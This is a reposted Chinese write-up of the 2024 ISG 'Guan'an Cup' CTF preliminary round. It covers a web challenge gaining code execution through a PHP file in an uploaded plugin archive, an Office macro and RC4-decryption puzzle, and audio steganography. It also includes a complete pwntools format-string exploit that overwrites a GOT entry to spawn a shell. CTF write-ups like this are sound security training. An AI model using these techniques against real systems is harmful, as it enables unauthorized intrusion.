0


2024年 ISG 网络安全技能竞赛“观安杯”管理运维赛初赛WP

2024年 ISG 网络安全技能竞赛“观安杯”管理运维赛初赛WP

2024年 ISG 网络安全技能竞赛“观安杯”管理运维赛初赛WP

  1. [X] 🛰:ly3260344435
  2. [X] 🐧:3260344435[X] BiliBili:鱼影安全
  3. [X] 公众号:鱼影安全
  4. [X] CSDN:落寞的魚丶
  5. [X] 知识星球:中职-高职-CTF竞赛
  6. [X] 信息安全评估(高职)、中职网络安全、金砖比赛、世界技能大赛省选拔选拔赛、电子取证比赛培训等

Web:

web_emm:

使用设置好的管理员用户和密码进行登录后台,然后点击插件

在这里插入图片描述
**在本地创建目录

  1. test-test

,然后在

  1. test

目录里创建

  1. test.php

**

在这里插入图片描述
**注意看一下压缩包的结构,一定要是一个目录里面包含

  1. php

文件,
不然就会报错显示安装失败,点击上传**

在这里插入图片描述
上传完事以后,访问路径

  1. isg.idss-cn.com:25554/content/plugins/test/test.php

在这里插入图片描述

Misc:

misc office:

**

  1. excl

表格

  1. Base64

解码得到密码:

  1. I#ziTxnxvbg#GC9

打开发现是假的**

在这里插入图片描述
在这里插入图片描述

**既然是

  1. office

的题肯定想到

使用工具

  1. oletool

得到

  1. VB

宏代码进行分析**

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
提取:

  1. Function Check(user_enc)
  2. Encrypted ="184,116,232,38,216,127,29,89,225,84,108,82,8,0,161,49,232,127,45,252,147,140,185,210,26,107,123,2,82,189,0,167,205,130,94,54,94,242,138,139,102,79,250,139,9,142,17,42,198,113,246,6,142,31,"If(user_enc <> Encrypted) Then
  3. Check = False
  4. Else
  5. Check = True
  6. End If
  7. End Function
  8. Private Sub Worksheet_Change(ByVal Target As Range)
  9. If Not Intersect(Target, Me.Range("B2")) Is Nothing Then
  10. If Check(crypto(Target.Value)) Then
  11. Me.Range("C2").Value ="success"
  12. Me.Range("C2").Interior.Color =RGB(232,245,233)
  13. Else
  14. Me.Range("C2").Value ="fail"
  15. Me.Range("C2").Interior.Color =RGB(251,233,231)
  16. End If
  17. End If
  18. End Sub
  19. Function crypto(sMessage)
  20. Dim kLen, x, y, i, j, temp
  21. Dim s(256)
  22. For i =0 To 255s(i)= i
  23. Next
  24. j =0
  25. For i =0 To 255
  26. j =(j +s(i)) Mod 256
  27. temp =s(i)s(i)=s(j)s(j)= temp
  28. Next
  29. x =0
  30. y =0
  31. For i =1 To Len(sMessage)
  32. x =(x +1) Mod 256
  33. y =(y +s(x)) Mod 256
  34. temp =s(x)s(x)=s(y)s(y)= temp
  35. crypto = crypto &(s((s(x)+s(y)) Mod 256) Xor Asc(Mid(sMessage, i,1)))&","
  36. Next
  37. End Function

**发现是

  1. RC4

直接进行解密(脚本:exp)**

  1. def initialize_key_schedule(seed):
  2. key_schedule =list(range(256)) # 初始化密钥调度表
  3. j =0for i in range(256):
  4. j =(j + key_schedule[i])%256
  5. key_schedule[i], key_schedule[j]= key_schedule[j], key_schedule[i]return key_schedule
  6. def rc4_crypt(seed, data):
  7. key_schedule =initialize_key_schedule(seed)
  8. x = y =0
  9. encrypted_data =[]for byte in data:
  10. x =(x +1)%256
  11. y =(y + key_schedule[x])%256
  12. key_schedule[x], key_schedule[y]= key_schedule[y], key_schedule[x]
  13. t = key_schedule[(key_schedule[x]+ key_schedule[y])%256]
  14. encrypted_data.append(chr(byte ^ t))return''.join(encrypted_data)
  15. # 原始的加密数据
  16. encrypted_data =[184,116,232,38,216,127,29,89,225,84,108,82,8,0,161,49,232,127,45,252,147,140,185,210,26,107,123,2,82,189,0,167,205,130,94,54,94,242,138,139,102,79,250,139,9,142,17,42,198,113,246,6,142,31] # 省略了部分数据
  17. #RC4密钥种子
  18. key_seed =[0]*len(encrypted_data) # 假设密钥种子与加密数据长度相同,这里仅作为示例
  19. # 执行RC4解密
  20. decrypted_data =rc4_crypt(key_seed, encrypted_data)print(decrypted_data)

在这里插入图片描述

方法2使用工具:

在这里插入图片描述

  1. flag{H@ckRr5_n3\/eR_c@RE_@60u+_9eN+13m3N'5_@9r33MEn+5}
misc see it:

在这里插入图片描述

**音频文件,

  1. binwalk -e

分离得到一个压缩包 里面有密码:

  1. p@ssw0rd_1s_myg0

**

在这里插入图片描述
在这里插入图片描述
**得到密码可以想到使用

  1. steghide

可以

  1. info

查看是否有隐藏文件 发现有 直接使用命令解密**

**在使用

  1. zsteg

工具得到

  1. flag

**

  1. steghide extract -sf challenge.wav
  2. zsteg mygo.png

在这里插入图片描述

在这里插入图片描述

  1. flag{m4k3_u53_0f_0p3n_50urc3_t00l5}

PWN:

pwn_reject dollar:

**输入存在

  1. $

过滤**

在这里插入图片描述
在这里插入图片描述
**

  1. Printf

输出时会进行排序,但是

  1. \n

可以绕过。发现格式化字符串漏洞。**

**直接手写利用

  1. payload getshell

**

exp:

  1. Exp
  2. from pwn import *#p=remote("isg.idss-cn.com",29564)
  3. p =process("./pwn")
  4. libc =ELF("./libc.so.6")
  5. elf =ELF("./pwn")
  6. def inpt(content):
  7. p.sendlineafter("e > ","1")
  8. p.sendlineafter("ge > ",content)
  9. def printf():
  10. p.sendlineafter("e > ","2")
  11. def puts():
  12. p.sendlineafter("e > ","3")
  13. def pwn():inpt("\n"+"%d"*42+".%p.")printf()
  14. p.recvuntil(".")
  15. libc.address =int(p.recvuntil(".")[:-1],16)-0x29d90
  16. addr1 =(libc.symbols['system']&0xffff)-0x21
  17. addr2 =((libc.symbols['system']>>16)&0xffff)-(libc.symbols['system']&0xffff)print('libc:',hex(libc.address))
  18. snd = b'\n'+b'%c'*0x20+b'%'+str(addr1).encode()+b'c%hn%'+str(addr2).encode()+b'c%hn'
  19. snd = snd.ljust((0x22-8)*8)+p64(elf.got['puts'])
  20. snd = snd.ljust((0x24-8)*8)+p64(elf.got['puts']+2)inpt(snd)printf()inpt("sh;")puts()
  21. p.interactive()pwn()
  22. ##flag{4DSmeHyBCZtF71VEPopsYvx5qa9UiGQu}
标签: CTF Misc Web

本文转载自: https://blog.csdn.net/Aluxian_/article/details/141325622
版权归原作者 落寞的魚丶 所有, 如有侵权,请联系我们删除。

“2024年 ISG 网络安全技能竞赛“观安杯”管理运维赛初赛WP”的评论:

还没有评论